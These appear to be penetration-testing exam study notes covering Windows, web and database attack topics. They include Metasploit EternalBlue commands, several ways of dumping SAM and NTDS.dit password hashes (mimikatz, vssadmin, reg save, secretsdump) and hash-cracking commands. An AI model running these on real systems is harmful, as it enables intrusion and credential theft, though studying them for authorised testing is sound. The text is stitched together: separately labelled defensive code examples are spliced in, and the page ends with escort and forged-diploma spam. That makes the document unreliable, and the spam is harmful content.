Long Question Useful
• Web Server Counter Measures – p158 2nd Edition
Appendix A: Soft Skills and Assessment Management
A5 Record Keeping, Interim Reporting & Final Results
Understanding reporting requirements. Understanding the importance of accurate and structured record keeping
during the engagement.
Appendix B: Core Technical Skills
B4 Network Mapping & Target Identification
Analysis of output from tools used to map the route between the engagement point and a number of targets.
Network sweeping techniques to prioritise a target list and the potential for false negatives.
B11 Cryptography
Differences between encryption and encoding. Symmetric / asymmetric encryption. Encryption algorithms: DES, 3DES, AES, RSA, RC4. Hashes: SHA1 and MD5. Message integrity codes: HMAC.
Appendix C: Background Information Gathering & Open Source
C3 Customer Web Site Analysis
Analysis of information from a target web site, both from displayed content and from within the HTML source.
Appendix E: Microsoft Windows Security Assessment
E4 Windows Passwords
Password policies (complexity, lockout policies). Account brute forcing. Hash storage (merits of LANMAN, NTLMv1 / v2). Offline password analysis (rainbow tables / hash brute forcing).
E5 Windows Vulnerabilities
Knowledge of remote Windows vulnerabilities, particularly those for which robust exploit code exists in the public domain.
Video: MS17-010 – Eternal Blue
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 10.10.12.107
exploit
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.12.107
exploit
Metasploit.txt
Metasploit
Start up and Update
Example: Metasploit - Exploiting MS17-010 - Eternalblue Vulnerability
Exploits
search: IIS, RDP
use $exploit
show options | show payloads | show targets
set settings ...
exploit/run (for auxiliary)
Auxiliary Modules
show options, set RHOSTS (and other values such as THREADS, VHOSTS), run
Eternal Blue SMB Remote Windows Kernel Pool Corruption-MS17-010
Knowledge of local Windows privilege escalation vulnerabilities and techniques.
Knowledge of common post exploitation activities:
• Obtain password hashes, both from the local SAM and cached credentials
HASHES
• Hashes are stored in the SAM database on a Windows system, or in the NTDS database on the Domain Controller.
1. SAM file (need both C:\windows\system32\config\SAM and C:\windows\system32\config\system)
2. Registry (HKEY_LOCAL_MACHINE\Security\Cache for domain credentials, HKEY_LOCAL_MACHINE\SAM for local credentials)
3. Domain Controller: C:\Windows\NTDS\NTDS.dit
4. In-memory (dump with mimikatz) -- however this last one isn't "stored" as in written to disk.
• LM hashes are the oldest password storage used by Windows, dating back to OS/2 in the 1980s, and were turned off by default starting in Windows Vista/Server 2008. It is possible to enable them in later versions through a GPO setting (even Windows 2016/10).
• NTHash is often referred to as the NTLM hash. Version 1 of the protocol uses both the NT and LM hash, depending on configuration and what is available. NTLMv2 (a different algorithm) is the default in Windows since Windows 2000.
OBTAINING THE HASHES
• Mimikatz has a feature (dcsync) which utilises the Directory Replication Service (DRS) to retrieve the password hashes from the NTDS.DIT file. It can be executed from any system that is part of the domain, in the context of a domain administrator.
lsadump::dcsync /domain:pentestlab.local /all /csv
• ntdsutil is part of the domain controller ecosystem; its purpose is to enable administrators to access and manage the Windows Active Directory database.
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be saved in Active Directory, and the SAM and SYSTEM files will be saved in the Registry folder.
• DiskShadow is a Microsoft-signed binary used to assist administrators with operations related to the Volume Shadow Copy Service (VSS). It is included in Windows Server 2008, Windows Server 2012 and Windows Server 2016.
• VSSadmin – comes with Windows servers. The volume shadow copy is a Windows command line utility which enables administrators to take backups of computers, volumes and files even if they are in use by the operating system.
vssadmin list shadows - check whether any shadow copies already exist
vssadmin create shadow /for=C: - create a shadow copy, then copy ntds.dit and SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\SAM1
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\SYSTEM1
NTDS may not exist if you did not dump from a DC.
vssadmin delete shadows /shadow=[GUID] - delete the shadow copy (if you need to run this…)
Then extract using either SamDump2 or impacket.
• Can also use Cain to dump the passwords.
• Registry and SamDump2
C:\WINDOWS\system32>reg save hklm\sam c:\sam
The operation completed successfully.
C:\WINDOWS\system32>reg save hklm\system c:\system
The operation completed successfully.
C:\WINDOWS\system32>reg save hklm\security c:\security
The operation completed successfully.
The security file contains the cached credentials.
Copy the files to Kali and run SamDump2 (or impacket, which gives more info):
root@Kali:~# samdump2 system sam
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
• PWdump - PWdump7 needs to be run as admin.
pwdump7 > hash.txt
• Cached Credentials
Having dumped the security hive from the registry:
C:\WINDOWS\system32>reg save hklm\security c:\security
The operation completed successfully.
Then from Kali, impacket gives the information from SAM and SYSTEM. The file names are sam and system. If you don't have security you can leave that argument out.
root@Kali:~# python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam -security security -system system LOCAL
Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies
[*] Target system bootKey: 0x4e52ab9bfb9019fb6827913377943620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
0000 01 00 00 00 D7 C6 B0 AD 57 36 7C D6 4C 22 3A 59 ........W6|.L":Y
0010 25 9E 19 C8 3F E0 8C E7 FD C5 53 6F B4 84 2E 83 %...?.....So....
0020 3B DB 63 C1 A5 EB FF 3A 05 89 C4 29 ;.c....:...)
[*] NL$KM
0000 5E FD D7 75 81 79 FE B5 B8 09 59 CA D9 68 76 32 ^..u.y....Y..hv2
0010 B4 96 A7 B3 A6 12 66 1D D9 AE C0 ED AE D2 0C B7 ......f.........
0020 6E E7 8E 89 D2 41 BF 92 58 E6 D4 C7 04 54 89 58 n....A..X....T.X
0030 01 EA D5 75 6C 8E EE E6 8C D6 F6 AA 02 12 7A 47 ...ul.........zG
[*] RasDialParams!S-1-5-21-2026301890-2774087781-1233172474-1001#0
0000 35 00 30 00 30 00 39 00 30 00 39 00 33 00 37 00 5.0.0.9.0.9.3.7.
0010 00 00 31 00 36 00 30 00 38 00 00 00 33 00 00 00 ..1.6.0.8...3...
0020 00 00 00 00 44 00 61 00 76 00 69 00 64 00 33 00 ....D.a.v.i.d.3.
0030 30 00 39 00 2D 00 56 00 50 00 4E 00 00 00 40 00 0.9.-.V.P.N...@.
0040 4A 00 61 00 70 00 61 00 6E 00 30 00 31 00 23 00 x.x.x.x.x.x.x.x.
0050 00 00 00 00 30 00 00 00 00 00 ....0.....
[*] Cleaning up...
• Obtain locally-stored clear-text password
• Crack password hashes
John the Ripper; Cain & Abel (a Windows-based tool with a host of useful features, including a password cracker).
It's normally a good idea to break very weak passwords with a simple dictionary attack and a short (5 character) brute-force attack first, then let the rainbow tables pick up the rest.
SHA256 Hashing:
kali# echo pearson | sha256sum
901….ba13
Windows password storage does not use a salt, so two users with the same password will have identical hashes. In Linux, because salting is used, two users with the same password will have different hashes.
NT hashes preserve the password's case (mixed case), whereas the LM hash is computed over the password converted to all uppercase.
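The HASHES section and the salting note above can be checked in code. The following is an added example, not part of these notes: a pure-Python MD4 (used because OpenSSL 3 builds of Python's hashlib often lack the legacy algorithm) computes NT hashes as MD4 over the UTF-16LE password with no salt, so two accounts with the same password get the same hash while a salted KDF gives different digests for the same password; an audit helper then reads pwdump/secretsdump-style `uid:rid:lmhash:nthash:::` lines and flags empty passwords, shared passwords and accounts that still have an LM hash stored. The dump lines are constructed, and the non-blank LM value in them is a placeholder rather than a real LM hash.

```python
import hashlib
import secrets
import struct

MASK = 0xFFFFFFFF
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" : LM storage is disabled


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _f(x, y, z):
    return (x & y) | ((~x & MASK) & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# Per round (RFC 1320): boolean function, message-word order, shift amounts, additive constant.
_ROUNDS = (
    (_f, list(range(16)), (3, 7, 11, 19), 0),
    (_g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
    (_h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 digest of `data`."""
    bit_len = len(data) * 8
    # Pad: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        v = state[:]
        for func, order, shifts, const in _ROUNDS:
            for i, k in enumerate(order):
                t = (-i) % 4  # register updated in this step cycles a, d, c, b, a, ...
                args = (v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4])
                v[t] = _rotl((v[t] + func(*args) + x[k] + const) & MASK, shifts[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE password, unsalted."""
    return md4(password.encode("utf-16le")).hex()


def salted_hash(password: str, salt=None):
    """Salted, iterated hash for contrast: same password, fresh salt, different digest."""
    salt = secrets.token_bytes(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)
    return salt, digest.hex()


def audit_dump(lines):
    """Flag weak storage in uid:rid:lmhash:nthash::: lines (pwdump / secretsdump layout)."""
    empty_nt = nt_hash("")
    by_nt, findings = {}, []
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, lm, nt = parts[0], parts[2].lower(), parts[3].lower()
        if lm != BLANK_LM:
            findings.append((user, "LM hash stored (LM storage should be disabled)"))
        if nt == empty_nt:
            findings.append((user, "empty password"))
        by_nt.setdefault(nt, []).append(user)
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != empty_nt:
            findings.append((",".join(users), "shared password (identical unsalted NT hash)"))
    return findings


# Constructed sample dump; the svc_backup LM value is a placeholder, not a real LM hash.
SAMPLE_DUMP = [
    f"Administrator:500:{BLANK_LM}:{nt_hash('')}:::",
    f"Guest:501:{BLANK_LM}:{nt_hash('')}:::",
    f"alice:1001:{BLANK_LM}:{nt_hash('Summer2019!')}:::",
    f"bob:1002:{BLANK_LM}:{nt_hash('Summer2019!')}:::",
    f"svc_backup:1003:0123456789abcdef0123456789abcdef:{nt_hash('password')}:::",
]

if __name__ == "__main__":
    print("NT('password') =", nt_hash("password"))
    for who, what in audit_dump(SAMPLE_DUMP):
        print(f"{who}: {what}")
```

The empty-password NT hash the audit looks for is the `31d6cfe0…` value that appears against the disabled accounts in the samdump2 and secretsdump output above; the shared-password check only works because NT hashes are unsalted, which is exactly the weakness the note describes.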
John the Ripper
John comes with its own dictionary at /usr/share/john/password.lst. You can edit the file to add your own passwords, or use your own list with --wordlist=/usr/share/john/file.lst.
In the output, the cracked password is on the left-hand side and the username on the right. The number next to the username tells you which half of the password it is cracking: for LMHASH, if the password is greater than 8 characters it is split into two halves, and it is always upper-cased, so the lowercase password "password" would be stored as PASSWOR and D.
kali# john password-hashes.txt
ACME201 (fireman:2)
The command below will show all passwords that have been cracked:
kali# john --show password-hashes.txt
The hidden directory ~/.john stores the output files: .log, .pot and .rec.
To change the format to NT cracking (default is LMHASH):
kali# john password-hashes.txt --format=nt
…and then you have to specify the format in the show command as well:
kali# john --show password-hashes.txt --format=nt
Hashcat
Has GPU (graphics card) support, so it is faster; it works on Windows and is able to crack a large variety of hash formats.
hashcat64.exe --potfile-path cracked-passwords.txt -m 3000 password_hashes.txt -a 3
The potfile is where the cracked passwords will be stored; -m 3000 specifies the hash format being cracked (3000 is LM hash and 1000 is NT hash); -a 3 specifies brute force.
To view the cracked passwords:
hashcat64.exe -m 3000 --potfile-path cracked_passwords.pot password_hashes.txt --show --username
A dictionary attack can be used instead:
hashcat64.exe --potfile-path cracked_passwords.pot -m 3000 password_hashes.txt D:\tools\hats\rockyou.txt -r D:\tool\hashcat-3.6.0\rules\InsidePro-PasswordsPro.rule
The rule file specifies various mangling rules.
• Check patch levels – CREST Exam Notes:
WMIC: wmic qfe list full /format:htable > hotfixes.htm
PowerShell (enter powershell): Get-WmiObject -Class "win32_quickfixengineering"
get-hotfix
Linux: Debian or Ubuntu: apt-get upgrade -s | grep -i security
RH: rpm -qa --last
• Derive list of missing security patches -
• Reversion to previous state: System Restore is a Windows feature that can help fix certain types of crashes and other computer problems.
Appendix G: Web Technologies
G2 Web Servers & their Flaws
Common web servers and their fundamental differences and vulnerabilities associated with them:
• IIS – P372 Network Security Assessment
• Apache (and variants) – P373 Network Security Assessment
G4 Web Protocols
Web protocols: HTTP, HTTPS, SOAP.
All HTTP web methods and response codes.
• See Exam Notes - Identifying Permitted HTTP Methods, also Web App Notes for Nmap NSE and Metasploit script (p16)
HTTP Header Fields relating to security features
• See Web App and Exam Notes
G7 Web Application Servers
Vulnerabilities in common application frameworks, servers and technologies: .NET (p413), J2EE, ColdFusion (p403),
Ruby on Rails (p409) and AJAX.
Chapter 14, Network Security Assessment.
AJAX Security - CS.html DotNet Security - CS.html Ruby on Rails - CS.html
G8 Web APIs
Application interfaces: CGI, ISAPI filters and Apache modules.
G9 Web Sub-Components
Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X.
Flash Application Testing
.Net Thick Clients
Java Applets
Decompilation of client-side code
Base64 decoding? – Burp Decoder
Appendix H: Web Testing Methodologies
H3 Information Gathering from Web Mark-up
Examples of the type of information available in web page source that may prove useful to an attacker:
• Hidden Form Fields – Burp: Proxy > Options > Response Modification: Unhide Hidden Form Fields.
• Database Connection Strings
• Credentials
• Developer Comments
• Other included files
• Authenticated-only URLs
H4 Authentication Mechanisms
Common pitfalls associated with the design and implementation of application authentication mechanisms.
• Useful p180, 2nd Edition
H5 Authorisation Mechanisms
Common pitfalls associated with the design and implementation of application authorisation mechanisms.
H6 Input Validation
The importance of input validation as part of a defensive coding strategy.
How input validation can be implemented and the differences between white listing, black listing and data
sanitisation.
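To make the three approaches in H6 concrete, here is an added Python example (not part of these notes) that runs the same inputs through an allow-list check, a deny-list check and HTML-context sanitisation, plus a canonicalise-then-range-check for a numeric field. The username pattern, the deny-list fragments and the sample inputs are all constructed for the example; the two failure modes it shows are a deny-list letting unlisted markup through and the same deny-list rejecting a legitimate value.

```python
import html
import re

# Allow-list: the exact shape of a valid username; anything else is rejected.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")
# Deny-list (for contrast): a handful of known-bad fragments, incomplete by nature.
DENY_FRAGMENTS = ("<script", "' or ", "--", ";")


def validate_username_allowlist(value: str) -> bool:
    """Accept only input matching the known-good pattern."""
    return USERNAME_RE.fullmatch(value) is not None


def passes_denylist(value: str) -> bool:
    """Reject input containing a listed bad fragment; everything else is let through."""
    lowered = value.lower()
    return not any(frag in lowered for frag in DENY_FRAGMENTS)


def parse_quantity(value: str, low: int = 1, high: int = 100):
    """Canonicalise then range-check a numeric field; None means 'not acceptable'."""
    text = value.strip()
    if re.fullmatch(r"\d{1,3}", text) is None:
        return None
    number = int(text)
    return number if low <= number <= high else None


def sanitise_for_html(value: str) -> str:
    """Sanitisation transforms rather than rejects: here, encoding for an HTML text context."""
    return html.escape(value, quote=True)


def classify(value: str) -> dict:
    """Run one input through all three approaches so their behaviour can be compared."""
    return {
        "allowlist": validate_username_allowlist(value),
        "denylist": passes_denylist(value),
        "sanitised": sanitise_for_html(value),
    }


if __name__ == "__main__":
    for sample in ("alice_01", "jean--luc", "alice<b>", "bob' or 1=1"):
        print(repr(sample), classify(sample))
```

Note that sanitisation is context-specific: `html.escape` is right for HTML text, but the same value placed into a SQL statement or a shell command needs a different treatment (parameterised queries, argument arrays), which is why validation at the boundary and encoding at the point of output are used together rather than as alternatives.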
H7 Application Fuzzing
Fuzzing and its relevance within web-app penetration testing.
The use of fuzz strings and their potential effects.
Potential dangers of fuzzing web applications.
H9 Use of Cross Site Scripting Attacks
Potential implications of a cross site scripting vulnerability.
Ways in which the technique can be used to benefit an attacker.
H10 Use of Injection Attacks
Potential implications of injection vulnerabilities:
• SQL injection
• LDAP injection
• Code injection
• XML injection
Ways in which these techniques can be used to benefit an attacker.
H11 Session Handling
Common pitfalls associated with the design and implementation of session handling mechanisms.
H12 Encryption
Common techniques used for encrypting data in transit and data at rest, either on the client or server side.
Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic
values (e.g. MD5 hashes)
Identification of common SSL vulnerabilities
H13 Source Code Review
Common techniques for identifying and reviewing deficiencies in the areas of security.
• Useful table p164, 2nd Edition
Appendix I: Web Testing Techniques
I1 Web Site Structure Discovery
Spidering tools and their relevance in a web application test for discovering linked content.
Forced browsing techniques to discover default or unlinked content -
Web Application Security Methodology and Testing: Directory and File Scanning, also Nikto
• Identification of functionality within client-side code
I2 Cross Site Scripting Attacks
Arbitrary JavaScript execution.
Using Cross Site Scripting techniques to obtain sensitive information from other users.
Phishing techniques.
• See XSS
I3 SQL Injection
Determine the existence of an SQL injection condition in a web application.
Determine the existence of a blind SQL injection condition in a web application.
Exploit SQL injection to enumerate the database and its structure.
Exploit SQL injection to execute commands on the target server.
• See SQL injection
I4 Session ID Attacks
Investigate session handling within a web application.
Harvest and analyse a number of session identifiers for weaknesses.
• See Testing Session ID and Token Strength
• Useful table p167 2nd Edition
I5 Fuzzing
The concept of fuzzing within a web application testing methodology.
Common fuzzing tools.
I6 Parameter Manipulation
Parameter manipulation techniques, particularly the use of client-side proxies.
I7 Data Confidentiality & Integrity
Identifying weak (or missing) encryption.
Identifying insecure SSL configurations.
Identify insecure use of encoding techniques
I8 Directory Traversal
Identifying directory traversal vulnerabilities within applications.
• See RFI and LFI, Path Traversal
I9 File Uploads
Identifying common vulnerabilities with file upload capabilities within applications.
• See Uploads.
I10 Code Injection
Investigate and exploitation of code injection vulnerabilities within web applications
• See OS command injection – get Commix working…
I11 CRLF Attacks
Assessment of web applications for CRLF vulnerabilities
• See HTTP Testing – Headers
I12 Application Logic Flaws
Assessing the logic flow within an application and the potential for subverting the logic.
Appendix J: Databases
J1 Microsoft SQL Server (p424)
Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack
techniques for a system compromised via database connections.
• See CREST exam notes
J2 Oracle RDBMS (p426)
Derivation of version and patch information from hosts running Oracle software.
Default Oracle accounts.
• See CREST exam notes
J3 Web / App / Database Connectivity
Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication methods
used by web applications
• See CREST exam notes
Useful Nmap Scripts
MS SQL
ms-sql-brute.nse - Performs password guessing against Microsoft SQL Server. SQL Server 2005 and later versions
include support for account lockout policies.
MySQL
nmap -p 3306 --script=mysql-info 127.0.0.1 - connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities, and the password salt.
nmap -sV -sC <target>
3306/tcp open mysql
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5.1
| Thread ID: 7
| Capabilities flags: 40968
| Some Capabilities: ConnectWithDatabase, SupportsTransactions, Support41Auth
| Status: Autocommit
|_ Salt: bYytNQ/4V6IN+*3`imj
mysql-enum – performs valid-user enumeration. Server versions 5.x are susceptible to a user enumeration attack due to different messages during login when using the old authentication mechanism from versions 4.x and earlier.
mysql-brute – Basic brute force, can be run without word list.
nmap --script=mysql-brute <target>
3306/tcp open mysql
| mysql-brute:
| Accounts
| root:root - Valid credentials
Additional
Identification of more recent SSL vulnerabilities – e.g. BEAST (page 318)
ssl-enum-ciphers - This script repeatedly initiates SSLv3/TLS connections, each time trying a new cipher or
compressor while recording whether a host accepts or rejects it. The end result is a list of all the cipher suites and
compressors that a server accepts.
nmap -sV --script ssl-enum-ciphers -p 443 <host>
• POODLE - we can deduce that a server is vulnerable to POODLE if it supports the SSLv3 protocol and uses CBC ciphers.
• BEAST - any server supporting SSLv3 or TLS 1.0 and using CBC ciphers.
BEAST was indeed an attack on CBC mode with a predictable (in fact known) IV in SSL3 and TLS 1.0, because those protocols used the last block of the previous record, which (usually) has already been sent and seen by the adversary, as the IV for the next record.
POODLE is not an attack on the IV at all; it is a padding oracle attack on the padding used in SSL3 (and, as it turned out, in some debatably defective TLS 1.0 implementations too), hence the acronym Padding Oracle On Downgraded Legacy Encryption.
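The two rules just stated (SSLv3 + CBC means POODLE; SSLv3 or TLS 1.0 + CBC means BEAST) are easy to apply mechanically to ssl-enum-ciphers output. The following is an added example, not from these notes: a small parser for the script's protocol/cipher layout and an assessment that reports which of the two conditions hold. The two scan outputs are constructed in the layout nmap uses, not real scan results, and the cipher suite names are standard IANA names chosen for the illustration.

```python
import re

# A protocol header line in ssl-enum-ciphers output, e.g. "|   TLSv1.0:"
PROTO_RE = re.compile(r"^\|\s+(SSLv3|TLSv1\.\d):\s*$")
# A cipher line, e.g. "|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A"
CIPHER_RE = re.compile(r"^\|\s+(TLS_[A-Z0-9_]+)")

# Constructed output in the layout of nmap's ssl-enum-ciphers script (not real scan data).
SAMPLE_LEGACY = """\
443/tcp open  https
| ssl-enum-ciphers:
|   SSLv3:
|     ciphers:
|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
|       TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C
|     compressors:
|       NULL
|   TLSv1.0:
|     ciphers:
|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
|   TLSv1.2:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A
|_  least strength: C
"""

SAMPLE_HARDENED = """\
443/tcp open  https
| ssl-enum-ciphers:
|   TLSv1.2:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A
|       TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A
|_  least strength: A
"""


def parse_enum_ciphers(output: str) -> dict:
    """Return {protocol: [cipher suite, ...]} from ssl-enum-ciphers script output."""
    suites, current = {}, None
    for line in output.splitlines():
        m = PROTO_RE.match(line)
        if m:
            current = m.group(1)
            suites[current] = []
            continue
        m = CIPHER_RE.match(line)
        if m and current is not None:
            suites[current].append(m.group(1))
    return suites


def assess(suites: dict) -> set:
    """Apply the POODLE and BEAST conditions from the notes to the parsed suites."""
    def has_cbc(names):
        return any("_CBC_" in n for n in names)

    findings = set()
    if "SSLv3" in suites:
        findings.add("SSLv3 enabled")
        if has_cbc(suites["SSLv3"]):
            findings.add("POODLE")  # SSLv3 padding oracle needs a CBC suite
    if any(has_cbc(suites.get(p, [])) for p in ("SSLv3", "TLSv1.0")):
        findings.add("BEAST")  # chained-IV CBC in SSL3 / TLS 1.0
    return findings


def assess_output(output: str) -> set:
    return assess(parse_enum_ciphers(output))


if __name__ == "__main__":
    print("legacy  :", sorted(assess_output(SAMPLE_LEGACY)))
    print("hardened:", sorted(assess_output(SAMPLE_HARDENED)))
```

The remediation the findings point to is the same in both cases: disable SSLv3 and TLS 1.0 on the server and prefer AEAD suites (the GCM suites in the hardened sample), after which neither condition can be met.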
Examples.txt
HTTP Header Fields relating to security features – e.g. HSTS
• See CREST Notes: HTTP Header Fields relating to security features
• Useful p172, 2nd Edition
Strict-Transport-Security.html
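As an added example for the HSTS point above (not code from these notes), the following Python parses a raw HTTP response head and reports a missing or weak Strict-Transport-Security header (short max-age, no includeSubDomains) alongside a few other security headers that such a check usually covers: X-Frame-Options, X-Content-Type-Options and Content-Security-Policy. The two response heads are constructed for the example; the one-year max-age threshold is the commonly recommended minimum and is an assumption of this check, not a value from the notes.

```python
# Constructed HTTP response heads (not captured from any real server).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Strict-Transport-Security: max-age=300\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains; preload\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Security-Policy: default-src 'self'\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

ONE_YEAR = 31536000  # seconds; assumed minimum acceptable HSTS max-age


def parse_headers(raw: str) -> dict:
    """Map lowercase header name -> value for a response head (status line skipped)."""
    headers = {}
    for line in raw.splitlines()[1:]:
        if not line.strip():
            break  # blank line ends the head
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def check_hsts(headers: dict) -> list:
    """Return a list of HSTS problems; empty means the header is present and strong."""
    value = headers.get("strict-transport-security")
    if value is None:
        return ["Strict-Transport-Security missing"]
    directives = {}
    for part in value.split(";"):
        key, _, val = part.strip().partition("=")
        directives[key.lower()] = val.strip()
    try:
        max_age = int(directives.get("max-age", ""))
    except ValueError:
        return ["HSTS max-age missing or malformed"]
    issues = []
    if max_age < ONE_YEAR:
        issues.append(f"HSTS max-age {max_age} below one year")
    if "includesubdomains" not in directives:
        issues.append("HSTS includeSubDomains not set")
    return issues


def check_security_headers(raw: str) -> list:
    """HSTS findings plus any of the other expected security headers that are absent."""
    headers = parse_headers(raw)
    issues = check_hsts(headers)
    for name in ("x-frame-options", "x-content-type-options", "content-security-policy"):
        if name not in headers:
            issues.append(f"{name} missing")
    return issues


if __name__ == "__main__":
    print("weak    :", check_security_headers(WEAK_RESPONSE))
    print("hardened:", check_security_headers(HARDENED_RESPONSE))
```

In a real test the raw head would come from the HTTPS response (HSTS is only honoured by browsers when received over TLS), so the check should be run against the TLS endpoint rather than a plain-HTTP redirect.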
Web Server security misconfigurations – e.g. WebDAV - Page 340, 372, and p116 2nd Edition
http-webdav-scan - The script sends an OPTIONS request which lists the dav type, server type, date and allowed
methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal ip addresses by doing
pattern matching in the response body.
nmap --script http-webdav-scan -p80,8080 <target>
Script Output
PORT STATE SERVICE
8008/tcp open http
| http-webdav-scan:
| Allowed Methods: GET, HEAD, COPY, MOVE, POST, PUT, PROPFIND, PROPPATCH, OPTIONS, MKCOL,
DELETE, TRACE, REPORT
| Server Type: DAV/0.9.8 Python/2.7.6
| Server Date: Fri, 22 May 2015 19:28:00 GMT
| WebDAV type: Unknown
| Directory Listing:
| http://localhost
| http://localhost:8008/WebDAVTest_b1tqTWeyRR
| http://localhost:8008/WebDAVTest_A0QWJb7hcK
| http://localhost:8008/WebDAVTest_hf9Mqqpi1M
|_ http://localhost:8008/WebDAVTest_Ds5KBFywDq
Metasploit has a few modules to test for WebDAV presence.
WebDAV.txt
Decompilation of client-side code – e.g. Flash, Java, .Net
Flash
• Flash maintains its own cookie store, allowing cookies that can't be deleted directly from the browser.
• ActionScript is an open source scripting language that compiles into bytecode and is leveraged in both Adobe Flash and Apache Flex. The bytecode is executed within an ActionScript Virtual Machine (AVM), which provides a sandbox environment similar to Java's.
• Though the ActionScript-compiled bytecode is not human-readable, tools such as SWFScan can turn the bytecode back into ActionScript.
• JPEXS Free Flash Decompiler
• Perl script – SWF-File-0.42
Java
• Java code runs in two primary ways: either as standalone Java applications or as web applets. Applets are Java code specifically designed to run within a web page.
• Java has a security model around applets, also known as the sandbox, that tries to prevent them from calling malicious code.
• A core difference between a signed applet and an unsigned applet (quarantined within the sandbox) is that a signed applet can execute code outside of the sandbox.
• Actions like accessing the file system or executing operating system commands are blocked by default. The Java security model requires code to be trusted or permission to be given before accessing functionality that has security implications.
• Java code is compiled into bytecode, resulting in a compiled class file that is then processed by the JVM.
• Reversing Java using JD-GUI – page 391
.Net
• JustDecompile
Vulnerabilities in increasingly prevalent application frameworks – e.g. Rails (p409)
Flash Application Testing
Java Applets
.Net Thick Clients
Identification of functionality within client-side code that is accessible only to privileged users

young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
 
Git and Github workshop GDSC MLRITM
Git and Github  workshop GDSC MLRITMGit and Github  workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
